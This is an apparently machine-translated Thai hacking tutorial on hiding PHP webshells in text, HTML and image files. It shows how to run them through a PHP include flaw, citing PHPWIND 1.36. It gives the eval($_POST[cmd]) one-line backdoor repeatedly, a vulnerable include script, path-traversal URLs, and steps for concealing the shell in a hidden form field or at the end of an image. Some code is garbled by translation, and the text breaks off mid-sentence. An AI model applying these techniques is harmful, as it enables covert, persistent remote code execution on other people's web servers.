คุณต้องรู้ว่าหากคุณใส่คำสั่ง PHP ลงในรูปภาพ มันจะไม่ถูกดำเนินการอีกต่อไป เนื่องจาก PHP จะแยกวิเคราะห์ไฟล์ที่มีนามสกุล php เท่านั้น ดังนั้นจึงจำเป็นต้องสามารถรันคำสั่ง PHP ที่ซ่อนอยู่ในภาพได้ เราแค่ใช้ฟังก์ชันการโทรใน PHP: include, need ฯลฯ
เรายังจำบทความเกี่ยวกับการซ่อนโทรจันในรูปภาพเมื่อไม่กี่วันก่อน นั่นคือ ใช้คำสั่งต่างๆ เช่น include("x.gif") ในไฟล์ PHP เพื่อเรียกคำสั่งม้าโทรจันที่ซ่อนอยู่ในภาพ คำสั่งใน ASP จะคล้ายกัน ดูเหมือนซ่อนเร้นมาก แต่ถ้าคุณเรียกรูปภาพโดยตรง ก็จะไม่ใช่เรื่องยากสำหรับคนที่รู้ PHP เพียงเล็กน้อยในการค้นหาสิ่งที่น่าสงสัย เนื่องจากเป็นการยากที่จะส่งผ่านพารามิเตอร์โดยใช้วิธี GET ใน URL ประสิทธิภาพของการแทรกโทรจันจึงไม่สามารถใช้งานได้อย่างเต็มที่
ฟังก์ชัน include ถูกใช้บ่อยครั้งใน PHP ดังนั้นจึงทำให้เกิดปัญหาด้านความปลอดภัยมากเกินไป ตัวอย่างเช่น ช่องโหว่ของ PHPWIND1.36 เกิดจากการขาดการกรองตัวแปรที่อยู่เบื้องหลัง include จากนี้เราสามารถสร้างคำสั่งที่คล้ายกันเพื่อแทรกลงในไฟล์ PHP ได้ จากนั้นซ่อนโทรจันไว้ในรูปภาพหรือไฟล์ HTML เรียกได้ว่าปกปิดได้มากกว่า ตัวอย่างเช่น แทรกคำสั่งต่อไปนี้ในฟอรัม PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>ผู้ดูแลระบบทั่วไปไม่สามารถมองเห็นได้
ด้วยความช่วยเหลือของฟังก์ชันรวม เราสามารถซ่อนโทรจัน PHP ในไฟล์หลายประเภท เช่น ไฟล์ txt, html และไฟล์รูปภาพ เนื่องจากไฟล์ทั้งสามประเภทนี้ ได้แก่ ไฟล์ txt, html และรูปภาพ เป็นไฟล์ที่พบบ่อยที่สุดในฟอรัมและระบบบทความ เราจึงทำการทดสอบตามลำดับด้านล่าง
ขั้นแรกให้สร้างไฟล์ PHP test.php เนื้อหาของไฟล์คือ:
<?php
$test=$_GET['ทดสอบ'];
@include 'test/'.$test;
?>
โดยทั่วไปไฟล์ Txt จะเป็นไฟล์คำอธิบาย ดังนั้นเราสามารถใส่โทรจันประโยคเดียวลงในไฟล์คำอธิบายของไดเร็กทอรีได้ เพียงสร้างไฟล์ TXT t.txt เราวางประโยค Trojan <?eval($_POST[cmd]);?> ลงในไฟล์ t.txt จากนั้นไปที่ http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > หากคุณเห็น เนื้อหาของ txt พิสูจน์ว่าตกลง จากนั้นเพิ่มที่อยู่โทรจันไคลเอ็นต์แบ็คดอร์ micro PHP ของ lanker ไปที่ http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? PHPWIND_ROOT=../robots.txt > เพียงเพิ่ม cmd ในรหัสผ่าน และคุณจะเห็นผลลัพธ์ที่ส่งคืนจากการดำเนินการ
สำหรับไฟล์ HTML โดยทั่วไปจะเป็นไฟล์เทมเพลต เพื่อให้ม้าโทรจันแทรกอยู่ในไฟล์ HTML เพื่อให้สามารถเรียกและดำเนินการโดยไม่ต้องแสดง เราสามารถเพิ่มกล่องข้อความที่มีคุณสมบัติที่ซ่อนอยู่ใน HTML เช่น: <input type=hidden value="<?eval($ _POST[cmd ]);?>"> จากนั้นใช้วิธีเดียวกันกับข้างต้น โดยทั่วไปสามารถเห็นผลลัพธ์ที่ส่งคืนของการดำเนินการได้โดยการดูไฟล์ต้นฉบับ เช่น ใช้ฟังก์ชันดูไดเร็กทอรีของโปรแกรมนี้ ดูเนื้อหาไฟล์ต้นฉบับเป็น <input type=hidden value="C:Uniserver2_7swwwtest"> ฉันสามารถรับไดเรกทอรีเป็น C:Uniserver2_7swwwtest
ตอนนี้เรามาพูดถึงไฟล์รูปภาพกันดีกว่า เคล็ดลับที่อันตรายที่สุดคือการซ่อนม้าโทรจันในภาพ เราสามารถแก้ไขรูปภาพได้โดยตรงและแทรก <?eval($_POST[cmd]);?> ที่ส่วนท้ายของรูปภาพ
หลังจากการทดสอบโดยทั่วไปแล้วจะไม่ส่งผลกระทบต่อภาพ จากนั้นเพิ่มที่อยู่โทรจันไคลเอนต์ในลักษณะเดียวกัน <